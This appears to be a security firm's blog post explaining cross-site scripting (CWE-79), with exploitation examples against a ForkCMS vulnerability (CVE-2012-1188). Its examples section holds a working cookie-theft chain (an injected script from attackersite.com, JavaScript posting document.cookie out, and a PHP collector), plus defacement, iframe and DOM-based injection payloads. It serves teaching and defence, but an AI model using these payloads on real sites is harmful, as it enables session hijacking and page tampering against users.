Cross-Site Scripting — XSS [CWE-79] — The Hacktivists

1. Description
………………………………

The weakness occurs when software does not perform or incorrectly performs neutralization of input data before displaying it in the user’s browser. As a result, an attacker is able to inject and execute arbitrary HTML and script code in a user’s browser in the context of a vulnerable website. Based on weakness conditions, it is common to divide cross-site scripting errors into 3 main types: reflected XSS, stored XSS and DOM-based XSS.

2. Potential impact
………………………………

After a successful attack, a malicious user can perform various actions: steal user’s cookies, modify webpage contents, and perform operations with the site within the user’s session (XSS proxy).

3. Attack patterns
………………………………

The following attack patterns can leverage cross-site scripting vulnerability, according to CAPEC (Common Attack Pattern Enumeration and Classification) classification:

4. Affected software
………………………………

Software that uses HTML to display data is potentially vulnerable to this weakness: web applications, browsers, ActiveX controls, browser plugins, email and RSS clients, frontends for hardware solutions, etc.

5. Exploitation Examples
………………………………

We will use a vulnerability in ForkCMS — HTB23075 security advisory (CVE-2012–1188) as an example of this weakness and show two different attacks against the vulnerable application.

http://forkcms.local/private/en/error?type=%3Cscript%20src=http://attackersite.com/fork.js%3E%3C/script%3E
function post_to_url(path, params, method) {
var form = document.createElement("form");
form.setAttribute("method", method);
form.setAttribute("action", path);
var hiddenField = document.createElement("input");
hiddenField.setAttribute("type", "hidden");
hiddenField.setAttribute("name", "1");
hiddenField.setAttribute("value", params);
form.appendChild(hiddenField);
document.body.appendChild(form);
form.submit();
}
post_to_url("http://attackersite.com/fork.php", document.cookie, "post");
<?php
file_put_contents($_SERVER["DOCUMENT_ROOT"]."/fork.txt",$_POST,FILE_APPEND);
file_put_contents($_SERVER["DOCUMENT_ROOT"]."/fork.txt","\r\n",FILE_APPEND);
header("Location: http://forkcms.local/private/en/");
exit;
?>
http://forkcms.local/private/en/error?type=%3C/div%3E%3Cdiv%20style=%22color:white;font:75px%20arial;position:absolute;left:0;top:0;background:black;width:100%;height:888px; border:1px%20solid;z-index:1000%22%3E%3Ccenter%3EXSS%3C/div%3E
http://forkcms.local/private/en/error?type=%3C/div%3E%3Ciframe%20src=%22http://www.attacker-site.com/file.html%22%20style=%22border=0;z-index:1000;position:absolute;left:0;top:0;height:100%;width:100%;%22%3E%3C/iframe%3E
{"OnlineUsers": "4", "UserAndStatus": ["User1, Online", "User2, Online", "User3, Online", "User4, Busy"]}
var http_request = new XMLHttpRequest();
var Contacts;
http_request.open("GET", url, true);
http_request.onreadystatechange = function ()
{
if (http_request.readyState == 4)
{
if (http_request.status == 200) {
Contacts = eval("(" + http_request.responseText + ")");
}
http_request = null;
}
};
http_request.send(null);
Busy"});alert("DOM based XSS");//

6. Severity and CVSS Scoring
……………………………………..

Cross-site scripting influences the integrity and confidentiality of the data and requires some user interaction (users must visit a specially crafted page or follow a malicious link). It should be scored as follows:
6.1 [CVSS:3.0/AV:N/.AC:L/.PR:N/.UI:R/.S:C/.C:L/.I:L/.A:N] — Medium severity.

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
The Hacktivists

The Hacktivists

Contact us for Information Security Services & Training https://thehacktivists.in/